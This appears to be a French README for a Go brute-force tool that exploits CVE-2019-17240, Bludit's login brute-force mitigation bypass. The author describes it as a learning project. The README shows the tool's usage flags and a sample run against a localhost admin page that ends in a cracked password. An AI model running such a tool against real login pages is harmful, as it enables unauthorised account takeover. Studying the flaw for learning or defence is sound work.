
Outil de force brute basé sur Go exploitant le contournement de la mitigation de force brute de Bludit (CVE-2019-17240) pour la casse automatisée de mots de passe sur les pages de connexion administrateur.
Ceci est un petit projet où je réécris ce script Python en Golang. Le but de ce projet était d'apprendre Golang et de comprendre le fonctionnement de cette exploitation.
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
Sauf le drapeau threads, tous les autres drapeaux sont obligatoires.
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password